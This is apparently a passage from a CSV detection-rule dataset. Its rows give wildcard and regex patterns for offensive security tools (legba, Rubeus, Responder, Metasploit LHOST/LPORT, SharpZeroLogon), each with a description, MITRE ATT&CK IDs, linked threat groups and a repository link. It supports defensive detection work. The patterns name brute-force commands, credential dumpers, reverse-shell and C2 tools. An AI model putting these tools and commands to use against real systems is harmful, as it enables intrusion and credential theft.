"*legba http.enum *--http*",".{0,1000}legba\shttp\.enum\s.{0,1000}\-\-http.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50935"
"*legba http.ntlm1 *",".{0,1000}legba\shttp\.ntlm1\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50936"
"*legba http.ntlm2 *",".{0,1000}legba\shttp\.ntlm2\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50937"
"*legba imap *--target *",".{0,1000}legba\simap\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50938"
"*legba kerberos *--target *",".{0,1000}legba\skerberos\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50939"
"*legba kerberos*--kerberos-realm *",".{0,1000}legba\skerberos.{0,1000}\-\-kerberos\-realm\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50940"
"*legba ldap *--ldap-domain*",".{0,1000}legba\sldap\s.{0,1000}\-\-ldap\-domain.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50941"
"*legba mongodb* --target *",".{0,1000}legba\smongodb.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50942"
"*legba mssql * --target *",".{0,1000}legba\smssql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50943"
"*legba mysql * --target *",".{0,1000}legba\smysql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50944"
"*legba pgsql * --target *",".{0,1000}legba\spgsql\s.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50945"
"*legba pop3 *--target *",".{0,1000}legba\spop3\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50946"
"*legba rdp *--target *",".{0,1000}legba\srdp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50947"
"*legba sftp *--target *",".{0,1000}legba\ssftp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50948"
"*legba smtp *--target *",".{0,1000}legba\ssmtp\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50949"
"*legba ssh *--target *",".{0,1000}legba\sssh\s.{0,1000}\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50950"
"*legba stomp *--target*",".{0,1000}legba\sstomp\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50951"
"*legba telnet *--telnet-*",".{0,1000}legba\stelnet\s.{0,1000}\-\-telnet\-.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50952"
"*legba vnc* --target *",".{0,1000}legba\svnc.{0,1000}\s\-\-target\s.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50953"
"*legba-main.zip*",".{0,1000}legba\-main\.zip.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","50954"
"*leitosama/SharpZeroLogon*",".{0,1000}leitosama\/SharpZeroLogon.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","1","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","50955"
"*lem0nSec/ShellGhost*",".{0,1000}lem0nSec\/ShellGhost.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","50957"
"*LemonSaaS/ghostsocks*",".{0,1000}LemonSaaS\/ghostsocks.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","1","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","50958"
"*lengjibo/FourEye*",".{0,1000}lengjibo\/FourEye.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","50959"
"*leo4j.gitbook.io/amnesiac*",".{0,1000}leo4j\.gitbook\.io\/amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","50960"
"*Leo4j/Amnesiac*",".{0,1000}Leo4j\/Amnesiac.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","50961"
"*Leo4j/Ask4Creds*",".{0,1000}Leo4j\/Ask4Creds.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","50962"
"*Leo4j/CheckSMBSigning*",".{0,1000}Leo4j\/CheckSMBSigning.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","50963"
"*Leo4j/Invoke-ADEnum*",".{0,1000}Leo4j\/Invoke\-ADEnum.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","50964"
"*Leo4j/Invoke-RunAsSystem*",".{0,1000}Leo4j\/Invoke\-RunAsSystem.{0,1000}","offensive_tool_keyword","Invoke-RunAsSystem","A simple script to elevate current session to SYSTEM (needs to be run as Administrator)","T1548.002 - T1059.001","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Invoke-RunAsSystem","1","1","N/A","N/A","8","1","14","1","2024-11-11T17:18:20Z","2023-08-24T15:12:40Z","50965"
"*Leo4j/Invoke-SessionHunter*",".{0,1000}Leo4j\/Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","1","N/A","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","50966"
"*Leo4j/Invoke-SMBRemoting*",".{0,1000}Leo4j\/Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","50967"
"*Leo4j/KeyCredentialLink*",".{0,1000}Leo4j\/KeyCredentialLink.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","1","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","50968"
"*Leo4j/PassSpray*",".{0,1000}Leo4j\/PassSpray.{0,1000}","offensive_tool_keyword","PassSpray","Domain Password Spray","T1110.003 - T1078","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/PassSpray","1","1","N/A","N/A","10","1","7","3","2025-02-20T10:07:43Z","2023-11-16T13:35:49Z","50969"
"*Leo4j/PS2EXE*",".{0,1000}Leo4j\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","1","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","50970"
"*Leo4j/ShellGen*",".{0,1000}Leo4j\/ShellGen.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","1","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","50971"
"*Leo4j/TGT_Monitor*",".{0,1000}Leo4j\/TGT_Monitor.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","50972"
"*Leo4j/Token-Impersonation*",".{0,1000}Leo4j\/Token\-Impersonation.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","1","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","50973"
"*leoloobeek/LAPSToolkit*",".{0,1000}leoloobeek\/LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","Scattered Spider*","Discovery","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","10","9","859","119","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z","50974"
"*leonardred1989@protonmail.com*",".{0,1000}leonardred1989\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50975"
"*letmeinbrudipls*",".{0,1000}letmeinbrudipls.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","50976"
"*LetMeOutSharp.*",".{0,1000}LetMeOutSharp\..{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","50977"
"*LetMeowIn.exe*",".{0,1000}LetMeowIn\.exe.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50978"
"*LetMeowIn-main.zip*",".{0,1000}LetMeowIn\-main\.zip.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50979"
"*leviathansecurity/TunnelVision*",".{0,1000}leviathansecurity\/TunnelVision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","50981"
"*lexfo/sshimpanzee*",".{0,1000}lexfo\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","50982"
"*Lexus89/SharpPack*",".{0,1000}Lexus89\/SharpPack.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","50983"
"*LFI scanner checks.jar*",".{0,1000}LFI\sscanner\schecks\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","50984"
"*lgandx/Pcredz*",".{0,1000}lgandx\/Pcredz.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","1","N/A","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","50985"
"*lgandx/Responder-Windows*",".{0,1000}lgandx\/Responder\-Windows.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","1","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","50986"
"*LgBkAGwAbAAAAAAASgAVAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABTAGgAYQByAHAAUwBo*",".{0,1000}LgBkAGwAbAAAAAAASgAVAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABTAGgAYQByAHAAUwBo.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","50987"
"*lgmpcpglpngdoalbgeoldeajfclnhafa*",".{0,1000}lgmpcpglpngdoalbgeoldeajfclnhafa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50988"
"*LHOST=* LPORT=*",".{0,1000}LHOST\=.{0,1000}\sLPORT\=.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50989"
"*liamg/traitor*",".{0,1000}liamg\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","1","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","50991"
"*lib.obfuscator.randomizers.vbarandomizer*",".{0,1000}lib\.obfuscator\.randomizers\.vbarandomizer.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","50992"
"*lib/Bruteforcer.cs*",".{0,1000}lib\/Bruteforcer\.cs.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","50993"
"*lib/ForgeTicket.*",".{0,1000}lib\/ForgeTicket\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50994"
"*lib/S4U.*",".{0,1000}lib\/S4U\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","50995"
"*Libbpf-powered rootkit*",".{0,1000}Libbpf\-powered\srootkit.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","50996"
"*LibcRealpathBufferUnderflow/RationalLove.c*",".{0,1000}LibcRealpathBufferUnderflow\/RationalLove\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","50997"
"*libFuzzer-HOWTO.*",".{0,1000}libFuzzer\-HOWTO\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50998"
"*-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32*",".{0,1000}\-LIBGCCW32\-EH\-3\-SJLJ\-GTHR\-MINGW32.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","50999"
"*libnfc_crypto1_crack a0a1a2a3a4a5 0 A 4 B*",".{0,1000}libnfc_crypto1_crack\sa0a1a2a3a4a5\s0\sA\s4\sB.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","51000"
